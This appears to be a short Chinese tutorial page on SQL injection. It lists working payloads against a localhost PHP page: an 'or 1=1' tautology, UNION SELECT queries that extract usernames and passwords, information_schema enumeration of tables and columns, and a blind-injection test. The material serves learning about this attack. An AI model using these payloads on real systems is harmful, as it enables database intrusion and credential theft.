Java教程
SQL注入
本文主要是介绍SQL注入,对大家解决编程问题具有一定的参考价值,需要的程序猿们随着小编来一起学习吧!
http://localhost/index.php?id=33 UNION SELECT 1,user,pass,4 from jokedb.users
//查询所有数据
http://localhost/index.php?id=0 or 1=1
--UNION注入破解用户名密码
select TABLE_SCHEMA FROM information_ schema.TABLES //数据库名称
//猜测表名
http://localhost/index.php?id=33 UNION select 1,TABLE_NAME,3,4 FROM information_schema.TABLES where TABLE_SCHEMA='jokedb'
//猜测字段名
select column_name from information_schema.columns where TABLE_SCHEMA='jokedb' and TABLE_NAME='users';
//查询用户名密码
http://localhost/index.php?id=33 UNION SELECT 1,user,pass,4 from jokedb.users
//盲注函数
select if(1=1,'tiger','monkey')
//猜表名是否存在
SELECT * FROM region WHERE (id = 33) and 1<(select count(*) from jokedb.xss )
这篇关于SQL注入的文章就介绍到这儿,希望我们推荐的文章对大家有所帮助,也希望大家多多支持为之网!
您可能喜欢
-
微服务架构中API版本控制的实践09-28
-
AI给的和自己写的Python代码,都无法改变输入框的内容,替换也不行09-28
-
Sentinel配置限流资料:新手入门教程09-27
-
Sentinel配置限流资料详解09-27
-
Sentinel限流资料:新手入门教程09-27
-
Sentinel限流资料入门详解09-26
-
Springboot框架资料:初学者入门教程09-26
-
Springboot框架资料详解:新手入门教程09-26
-
Springboot企业级开发资料:新手入门指南09-26
-
SpringBoot企业级开发资料新手指南09-26
-
Springboot微服务资料入门教程09-26
-
SpringBoot微服务资料入门指南09-26
-
Springboot项目开发资料:新手入门及初级实战教程09-26
-
Springboot项目开发资料:新手入门教程09-26
-
SpringCloud Alibaba资料入门详解09-26
栏目导航
